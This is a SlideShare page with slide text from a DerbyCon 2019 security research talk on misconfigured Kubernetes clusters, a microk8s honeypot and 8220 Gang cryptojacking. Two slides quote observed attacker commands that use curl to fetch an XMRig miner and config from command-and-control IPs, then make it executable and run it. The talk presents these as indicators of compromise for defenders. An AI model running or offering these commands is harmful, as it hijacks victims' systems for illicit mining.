SlideShare ist ein Scribd-Unternehmen logo

DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty

Lacework
Lacework

Lacework's Dir. of Research's presentation from DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty

Technologie
1 von 33
Downloaden Sie, um offline zu lesen
@laceworklabs Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty James Condon DerbyCon 2019
@laceworklabs cryptobooty cryp • to • boo • ty /ˈkriptō bo͞odē/ noun Cryptocurrency obtained from illicit coinmining in a Kubernetes cluster.
@laceworklabs whoami • James Condon, Director of Research @ Lacework • Former USAF OSI, Mandiant, and ProtectWise • Network Forensics, Incident Response, Threat Intelligence, Cloud Security TwiIer: @laceworklabs, @jameswcondon Email: james@lacework.com Blog: www.lacework.com/blog/
@laceworklabs Networking Provisioning Security Storage Redundancy Auto-Scaling
@laceworklabs
@laceworklabs Master API Server etcd Scheduler Control Manger Node Kubelet Pod 1...n Node Kubelet Pod 1...n UI Dashboard CLI BASIC ARCHITECTURE
@laceworklabs EXPOSED CLUSTER RESEARCH
@laceworklabs Commonly Misconfigured K8s Components Dashboard API Server etcd Kubelet
@laceworklabs DISCOVERING DASHBOARDS DEMO
@laceworklabs 500 2,400 21,000 600 DASHBOARDS ETCD CLUSTERS API SERVERS (SECURE) API SERVERS (INSECURE)
@laceworklabs SETTING A TRAP
@laceworklabs CURIOUS ABOUT K8s ATTACKS • Based on exposure we discovered, how is it exploited? • K8s is relaVvely newer, how long will compromise take? • Whats the best way to setup our honeypot? • Is there any other reporVng we can find?
@laceworklabs MICROK8s & SUPPOIE
@laceworklabs MICROK8s & SUPPOIE
@laceworklabs WHAT IS MICROK8s? • Single-node K8s cluster. • Very easy to setup • Use it for offline development, prototyping, testing, or use it on a VM as a small, cheap, reliable k8s for CI/CD.
@laceworklabs SETTING UP OUR HONEYPOT • Spin up Ubuntu Server • Install microk8s via snap • Enable Kubernetes dashboard and DNS • Check insecure api is accessible • Expose instance to allow all traffic • Start tcpdump trace for interesting ports • DISCLAIMER: microk8s is NOT intended to be used like this
@laceworklabs THE ATTACK • Expected an attack with 24 hours, ended up being 31 days! • Dashboard left untouched • Lots of general internet scanning, nothing k8s specific
@laceworklabs
@laceworklabs
@laceworklabs
@laceworklabs
@laceworklabs
@laceworklabs THE ATTACKERS • C2 IP • Reported by mulVple security vendors • Reported in private security research • MulVple Ves to 8220 Gang • Used in various Cryptojacking aIacks (outside K8s) • Monero Address & Mining Pools • Reported in various Cryptojacking campaigns including Kubernetes aIacks
@laceworklabs ASSESSING THE DAMAGE
@laceworklabs SCANNING FOR INSECURE APIs - IPs • At time of research, 678 IPs in censys search for insecure APIs • Mostly TCP port 8080 & 443 • Primarily Amazon, GCP, OVH, Tencent, & Alibaba • US, China, Germany, and Ireland
@laceworklabs SCANNING POD CONFIGs • 10,743 Pods • Common Pod names: mi125yap*, y1ee115-*, y1ee114-* • Common Labels & Container names: myresd02 & myresd01 • Most popular image: centos
@laceworklabs CONTAINER COMMANDS INDICATIVE OF COMRPOMISE curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/222.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;./xmrig -c config.json curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json
@laceworklabs CONTAINER COMMANDS INDICATIVE OF COMRPOMISE curl -o /var/tmp/config.json http://158.69.133.18:8220/222.json;curl -o /var/tmp/suppoie1 http://158.69.133.18:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /var/tmp/xmrig.tar.gz;tar -xzvf xmrig;curl -o /var/tmp/config.json http://202.144.193.159/222.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;./xmrig -c config.json
@laceworklabs 4,450 CRYPTOJACKING PODS
@laceworklabs C2 IPs • 202.144.193.159 • Seen in our honeypot • Two different download methods • Not much open source reporting • 192.99.142.232 • Seen in prior microk8s reporting • Uses suppioe naming, and 8220 gang TTPs • 158.69.133.18 • Seen in “Drupalgeddon” aIacks • Uses suppioe naming, and 8220 gang TTPs
@laceworklabs FINAL THOUGHTS • Cryptojacking is the Vp of the iceberg • There is much more an aIacker could do in these scenarios…such as pivoVng to the cloud service provider
@laceworklabs resources 1. Tesla Exposed Dashboard https://redlock.io/blog/cryptojacking-tesla 2. Lacework Containers at Risk Report https://info.lacework.com/hubfs/Containers%20At- Risk_%20A%20Review%20of%2021,000%20Cloud%20Environments.pdf 3. Exposed etcd Clusters Blog https://elweb.co/the-security-footgun-in-etcd/ 4. Lacework exposed etcd Clusters Blog https://www.lacework.com/etcd-thousands-of-clusters-open/ 5. Kubernetes Illustrated Children's Guide: https://youtu.be/4ht22ReBjno 6. An overview of MicroK8s (a tool to quick-start a Kubernetes cluster) and why using it in the cloud was a terrible idea (https://medium.com/faun/an-overview-of-microk8s-and-why-using-it-in-the-cloud-was-a-terrible-idea- 9ba8506dc467) 7. Suppoie Crypto Hijack (https://blog.infostruction.com/2018/04/24/suppoie-crypto-hijack/) 8. Cryptojacking Campaign Targets Exposed Kubernetes Clusters (https://www.lacework.com/cryptojacking- targets-exposed-kubernetes-clusters/) 9. MicroK8s PR - Get most services out of the default interface (https://github.com/ubuntu/microk8s/pull/88)
@laceworklabs QUESTIONS Twitter: @laceworklabs, @jameswcondon Email: james@lacework.com Blog: www.lacework.com/blog/

Empfohlen

All Your Containers Are Belong To Us
All Your Containers Are Belong To UsAll Your Containers Are Belong To Us
All Your Containers Are Belong To UsLacework
 
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Lacework
 
Lacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework
 
BSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes Back
BSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes BackBSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes Back
BSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes BackLacework
 
Lacework Kubernetes Meetup | August 28, 2018
Lacework Kubernetes Meetup | August 28, 2018Lacework Kubernetes Meetup | August 28, 2018
Lacework Kubernetes Meetup | August 28, 2018Lacework
 
AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...
AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...
AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...Lacework
 
Security threats with Kubernetes - Igor Khoroshchenko
Security threats with Kubernetes - Igor Khoroshchenko Security threats with Kubernetes - Igor Khoroshchenko
Security threats with Kubernetes - Igor KhoroshchenkoKuberton
 
EKS security best practices
EKS security best practicesEKS security best practices
EKS security best practicesJohn Varghese
 

Empfohlen

All Your Containers Are Belong To Us
All Your Containers Are Belong To UsAll Your Containers Are Belong To Us
All Your Containers Are Belong To UsLacework
 
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019
Batten Down the Hatches: A Practical Guide to Securing Kubernetes - RMISC 2019Lacework
 
Lacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework
 
BSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes Back
BSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes BackBSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes Back
BSides Denver 2019 - Cloud Wars Episode V: The Cryptojacker Strikes BackLacework
 
Lacework Kubernetes Meetup | August 28, 2018
Lacework Kubernetes Meetup | August 28, 2018Lacework Kubernetes Meetup | August 28, 2018
Lacework Kubernetes Meetup | August 28, 2018Lacework
 
AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...
AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...
AWS Security Week | Getting to Continuous Security and Compliance Monitoring ...Lacework
 
Security threats with Kubernetes - Igor Khoroshchenko
Security threats with Kubernetes - Igor Khoroshchenko Security threats with Kubernetes - Igor Khoroshchenko
Security threats with Kubernetes - Igor KhoroshchenkoKuberton
 
EKS security best practices
EKS security best practicesEKS security best practices
EKS security best practicesJohn Varghese
 
Using Splunk/ELK for auditing AWS/GCP/Azure security posture
Using Splunk/ELK for auditing AWS/GCP/Azure security postureUsing Splunk/ELK for auditing AWS/GCP/Azure security posture
Using Splunk/ELK for auditing AWS/GCP/Azure security postureJose Hernandez
 
Native cloud security monitoring
Native cloud security monitoringNative cloud security monitoring
Native cloud security monitoringJohn Varghese
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSTeri Radichel
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the CloudTeri Radichel
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless worldYan Cui
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security StrategyTeri Radichel
 
CloudBurst Malmö: Best practices of securing web applications running on Azur...
CloudBurst Malmö: Best practices of securing web applications running on Azur...CloudBurst Malmö: Best practices of securing web applications running on Azur...
CloudBurst Malmö: Best practices of securing web applications running on Azur...Karl Ots
 
Mining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudMining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudCloudVillage
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityCloudVillage
 
What is Google Cloud Good For at DevFestInspire 2021
What is Google Cloud Good For at DevFestInspire 2021What is Google Cloud Good For at DevFestInspire 2021
What is Google Cloud Good For at DevFestInspire 2021Robert John
 
TechDays Finland 2020: Best practices of securing web applications running on...
TechDays Finland 2020: Best practices of securing web applications running on...TechDays Finland 2020: Best practices of securing web applications running on...
TechDays Finland 2020: Best practices of securing web applications running on...Karl Ots
 
IglooConf 2020: Best practices of securing web applications running on Azure ...
IglooConf 2020: Best practices of securing web applications running on Azure ...IglooConf 2020: Best practices of securing web applications running on Azure ...
IglooConf 2020: Best practices of securing web applications running on Azure ...Karl Ots
 
Kube Apps in action
Kube Apps in actionKube Apps in action
Kube Apps in actionKarthik Gaekwad
 
Attacking VPN's
Attacking VPN'sAttacking VPN's
Attacking VPN'sn|u - The Open Security Community
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityAvi Shulman
 
Scaling Security in the Cloud With Open Source
Scaling Security in the Cloud With Open SourceScaling Security in the Cloud With Open Source
Scaling Security in the Cloud With Open SourceCloudVillage
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWSTeri Radichel
 
Phishing in the cloud era
Phishing in the cloud eraPhishing in the cloud era
Phishing in the cloud eraCloudVillage
 
Prepare to defend thyself with Blue/Green
Prepare to defend thyself with Blue/GreenPrepare to defend thyself with Blue/Green
Prepare to defend thyself with Blue/GreenSonatype
 
Security for Complex Networks on AWS
Security for Complex Networks on AWSSecurity for Complex Networks on AWS
Security for Complex Networks on AWSTeri Radichel
 
Kubered -Recipes for C2 Operations on Kubernetes
Kubered -Recipes for C2 Operations on KubernetesKubered -Recipes for C2 Operations on Kubernetes
Kubered -Recipes for C2 Operations on KubernetesJeffrey Holden
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes securityThomas Fricke
 

Weitere ähnliche Inhalte

Was ist angesagt?

Using Splunk/ELK for auditing AWS/GCP/Azure security posture
Using Splunk/ELK for auditing AWS/GCP/Azure security postureUsing Splunk/ELK for auditing AWS/GCP/Azure security posture
Using Splunk/ELK for auditing AWS/GCP/Azure security postureJose Hernandez
 
Native cloud security monitoring
Native cloud security monitoringNative cloud security monitoring
Native cloud security monitoringJohn Varghese
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSTeri Radichel
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the CloudTeri Radichel
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless worldYan Cui
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security StrategyTeri Radichel
 
CloudBurst Malmö: Best practices of securing web applications running on Azur...
CloudBurst Malmö: Best practices of securing web applications running on Azur...CloudBurst Malmö: Best practices of securing web applications running on Azur...
CloudBurst Malmö: Best practices of securing web applications running on Azur...Karl Ots
 
Mining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudMining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudCloudVillage
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityCloudVillage
 
What is Google Cloud Good For at DevFestInspire 2021
What is Google Cloud Good For at DevFestInspire 2021What is Google Cloud Good For at DevFestInspire 2021
What is Google Cloud Good For at DevFestInspire 2021Robert John
 
TechDays Finland 2020: Best practices of securing web applications running on...
TechDays Finland 2020: Best practices of securing web applications running on...TechDays Finland 2020: Best practices of securing web applications running on...
TechDays Finland 2020: Best practices of securing web applications running on...Karl Ots
 
IglooConf 2020: Best practices of securing web applications running on Azure ...
IglooConf 2020: Best practices of securing web applications running on Azure ...IglooConf 2020: Best practices of securing web applications running on Azure ...
IglooConf 2020: Best practices of securing web applications running on Azure ...Karl Ots
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityAvi Shulman
 
Scaling Security in the Cloud With Open Source
Scaling Security in the Cloud With Open SourceScaling Security in the Cloud With Open Source
Scaling Security in the Cloud With Open SourceCloudVillage
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWSTeri Radichel
 
Phishing in the cloud era
Phishing in the cloud eraPhishing in the cloud era
Phishing in the cloud eraCloudVillage
 
Prepare to defend thyself with Blue/Green
Prepare to defend thyself with Blue/GreenPrepare to defend thyself with Blue/Green
Prepare to defend thyself with Blue/GreenSonatype
 
Security for Complex Networks on AWS
Security for Complex Networks on AWSSecurity for Complex Networks on AWS
Security for Complex Networks on AWSTeri Radichel
 

Was ist angesagt? (20)

Using Splunk/ELK for auditing AWS/GCP/Azure security posture
Using Splunk/ELK for auditing AWS/GCP/Azure security postureUsing Splunk/ELK for auditing AWS/GCP/Azure security posture
Using Splunk/ELK for auditing AWS/GCP/Azure security posture
 
Native cloud security monitoring
Native cloud security monitoringNative cloud security monitoring
Native cloud security monitoring
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWS
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the Cloud
 
Security in Serverless world
Security in Serverless worldSecurity in Serverless world
Security in Serverless world
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security Strategy
 
CloudBurst Malmö: Best practices of securing web applications running on Azur...
CloudBurst Malmö: Best practices of securing web applications running on Azur...CloudBurst Malmö: Best practices of securing web applications running on Azur...
CloudBurst Malmö: Best practices of securing web applications running on Azur...
 
Mining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudMining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the Cloud
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
 
What is Google Cloud Good For at DevFestInspire 2021
What is Google Cloud Good For at DevFestInspire 2021What is Google Cloud Good For at DevFestInspire 2021
What is Google Cloud Good For at DevFestInspire 2021
 
TechDays Finland 2020: Best practices of securing web applications running on...
TechDays Finland 2020: Best practices of securing web applications running on...TechDays Finland 2020: Best practices of securing web applications running on...
TechDays Finland 2020: Best practices of securing web applications running on...
 
IglooConf 2020: Best practices of securing web applications running on Azure ...
IglooConf 2020: Best practices of securing web applications running on Azure ...IglooConf 2020: Best practices of securing web applications running on Azure ...
IglooConf 2020: Best practices of securing web applications running on Azure ...
 
Kube Apps in action
Kube Apps in actionKube Apps in action
Kube Apps in action
 
Attacking VPN's
Attacking VPN'sAttacking VPN's
Attacking VPN's
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
 
Scaling Security in the Cloud With Open Source
Scaling Security in the Cloud With Open SourceScaling Security in the Cloud With Open Source
Scaling Security in the Cloud With Open Source
 
Packet Capture on AWS
Packet Capture on AWSPacket Capture on AWS
Packet Capture on AWS
 
Phishing in the cloud era
Phishing in the cloud eraPhishing in the cloud era
Phishing in the cloud era
 
Prepare to defend thyself with Blue/Green
Prepare to defend thyself with Blue/GreenPrepare to defend thyself with Blue/Green
Prepare to defend thyself with Blue/Green
 
Security for Complex Networks on AWS
Security for Complex Networks on AWSSecurity for Complex Networks on AWS
Security for Complex Networks on AWS
 

Ähnlich wie DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty

Kubered -Recipes for C2 Operations on Kubernetes
Kubered -Recipes for C2 Operations on KubernetesKubered -Recipes for C2 Operations on Kubernetes
Kubered -Recipes for C2 Operations on KubernetesJeffrey Holden
 
Security Tips to run Docker in Production
Security Tips to run Docker in ProductionSecurity Tips to run Docker in Production
Security Tips to run Docker in ProductionGianluca Arbezzano
 
How Zalando runs Kubernetes clusters at scale on AWS - AWS re:Invent
How Zalando runs Kubernetes clusters at scale on AWS - AWS re:InventHow Zalando runs Kubernetes clusters at scale on AWS - AWS re:Invent
How Zalando runs Kubernetes clusters at scale on AWS - AWS re:InventHenning Jacobs
 
Игорь Фесенко "Direction of C# as a High-Performance Language"
Игорь Фесенко "Direction of C# as a High-Performance Language"Игорь Фесенко "Direction of C# as a High-Performance Language"
Игорь Фесенко "Direction of C# as a High-Performance Language"Fwdays
 
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Ajin Abraham
 
Docker Security
Docker SecurityDocker Security
Docker Securityantitree
 
K8s best practices from the field!
K8s best practices from the field!K8s best practices from the field!
K8s best practices from the field!DoiT International
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
Securing your Container Environment with Open Source
Securing your Container Environment with Open SourceSecuring your Container Environment with Open Source
Securing your Container Environment with Open SourceMichael Ducy
 
Kubernetes - Starting with 1.2
Kubernetes - Starting with 1.2Kubernetes - Starting with 1.2
Kubernetes - Starting with 1.2William Stewart
 
The Container Security Checklist
The Container Security Checklist The Container Security Checklist
The Container Security Checklist LibbySchulze
 
CloudNativeTurkey - Lines of Defence.pdf
CloudNativeTurkey - Lines of Defence.pdfCloudNativeTurkey - Lines of Defence.pdf
CloudNativeTurkey - Lines of Defence.pdfKoray Oksay
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Who is afraid of privileged containers ?
Who is afraid of privileged containers ?Who is afraid of privileged containers ?
Who is afraid of privileged containers ?Marko Bevc
 
Secrets in Kubernetes
Secrets in KubernetesSecrets in Kubernetes
Secrets in KubernetesQvik
 
Secrets in Kubernetes
Secrets in KubernetesSecrets in Kubernetes
Secrets in KubernetesJerry Jalava
 

Ähnlich wie DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty (20)

Kubered -Recipes for C2 Operations on Kubernetes
Kubered -Recipes for C2 Operations on KubernetesKubered -Recipes for C2 Operations on Kubernetes
Kubered -Recipes for C2 Operations on Kubernetes
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes security
 
Security Tips to run Docker in Production
Security Tips to run Docker in ProductionSecurity Tips to run Docker in Production
Security Tips to run Docker in Production
 
How Zalando runs Kubernetes clusters at scale on AWS - AWS re:Invent
How Zalando runs Kubernetes clusters at scale on AWS - AWS re:InventHow Zalando runs Kubernetes clusters at scale on AWS - AWS re:Invent
How Zalando runs Kubernetes clusters at scale on AWS - AWS re:Invent
 
Игорь Фесенко "Direction of C# as a High-Performance Language"
Игорь Фесенко "Direction of C# as a High-Performance Language"Игорь Фесенко "Direction of C# as a High-Performance Language"
Игорь Фесенко "Direction of C# as a High-Performance Language"
 
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
 
Docker Security
Docker SecurityDocker Security
Docker Security
 
K8s best practices from the field!
K8s best practices from the field!K8s best practices from the field!
K8s best practices from the field!
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
MLSEC 2020
MLSEC 2020MLSEC 2020
MLSEC 2020
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 
Securing your Container Environment with Open Source
Securing your Container Environment with Open SourceSecuring your Container Environment with Open Source
Securing your Container Environment with Open Source
 
Kubernetes - Starting with 1.2
Kubernetes - Starting with 1.2Kubernetes - Starting with 1.2
Kubernetes - Starting with 1.2
 
The Container Security Checklist
The Container Security Checklist The Container Security Checklist
The Container Security Checklist
 
CloudNativeTurkey - Lines of Defence.pdf
CloudNativeTurkey - Lines of Defence.pdfCloudNativeTurkey - Lines of Defence.pdf
CloudNativeTurkey - Lines of Defence.pdf
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Who is afraid of privileged containers ?
Who is afraid of privileged containers ?Who is afraid of privileged containers ?
Who is afraid of privileged containers ?
 
Secrets in Kubernetes
Secrets in KubernetesSecrets in Kubernetes
Secrets in Kubernetes
 
Secrets in Kubernetes
Secrets in KubernetesSecrets in Kubernetes
Secrets in Kubernetes
 

Mehr von Lacework

Practical Guide to Securing Kubernetes
Practical Guide to Securing KubernetesPractical Guide to Securing Kubernetes
Practical Guide to Securing KubernetesLacework
 
Lacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework
 
Lacework Overview: Security Redefined for Cloud Scale
Lacework Overview: Security Redefined for Cloud ScaleLacework Overview: Security Redefined for Cloud Scale
Lacework Overview: Security Redefined for Cloud ScaleLacework
 
Containers At-Risk: A Review of 21,000 Cloud Environments
Containers At-Risk: A Review of 21,000 Cloud EnvironmentsContainers At-Risk: A Review of 21,000 Cloud Environments
Containers At-Risk: A Review of 21,000 Cloud EnvironmentsLacework
 
Lacework Protection for AWS S3 Buckets
Lacework Protection for AWS S3 BucketsLacework Protection for AWS S3 Buckets
Lacework Protection for AWS S3 BucketsLacework
 
Guidebook Case Study
Guidebook Case StudyGuidebook Case Study
Guidebook Case StudyLacework
 
Container Security Research
Container Security ResearchContainer Security Research
Container Security ResearchLacework
 
Security for AWS: Journey to Least Privilege
Security for AWS: Journey to Least PrivilegeSecurity for AWS: Journey to Least Privilege
Security for AWS: Journey to Least PrivilegeLacework
 
Containers At-Risk A Review of 21,000 Cloud Environments
Containers At-Risk A Review of 21,000 Cloud EnvironmentsContainers At-Risk A Review of 21,000 Cloud Environments
Containers At-Risk A Review of 21,000 Cloud EnvironmentsLacework
 
Lacework for AWS Security Overview
Lacework for AWS Security OverviewLacework for AWS Security Overview
Lacework for AWS Security OverviewLacework
 

Mehr von Lacework (10)

Practical Guide to Securing Kubernetes
Practical Guide to Securing KubernetesPractical Guide to Securing Kubernetes
Practical Guide to Securing Kubernetes
 
Lacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework AWS Security Week Presentation
Lacework AWS Security Week Presentation
 
Lacework Overview: Security Redefined for Cloud Scale
Lacework Overview: Security Redefined for Cloud ScaleLacework Overview: Security Redefined for Cloud Scale
Lacework Overview: Security Redefined for Cloud Scale
 
Containers At-Risk: A Review of 21,000 Cloud Environments
Containers At-Risk: A Review of 21,000 Cloud EnvironmentsContainers At-Risk: A Review of 21,000 Cloud Environments
Containers At-Risk: A Review of 21,000 Cloud Environments
 
Lacework Protection for AWS S3 Buckets
Lacework Protection for AWS S3 BucketsLacework Protection for AWS S3 Buckets
Lacework Protection for AWS S3 Buckets
 
Guidebook Case Study
Guidebook Case StudyGuidebook Case Study
Guidebook Case Study
 
Container Security Research
Container Security ResearchContainer Security Research
Container Security Research
 
Security for AWS: Journey to Least Privilege
Security for AWS: Journey to Least PrivilegeSecurity for AWS: Journey to Least Privilege
Security for AWS: Journey to Least Privilege
 
Containers At-Risk A Review of 21,000 Cloud Environments
Containers At-Risk A Review of 21,000 Cloud EnvironmentsContainers At-Risk A Review of 21,000 Cloud Environments
Containers At-Risk A Review of 21,000 Cloud Environments
 
Lacework for AWS Security Overview
Lacework for AWS Security OverviewLacework for AWS Security Overview
Lacework for AWS Security Overview
 

Kürzlich hochgeladen

Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
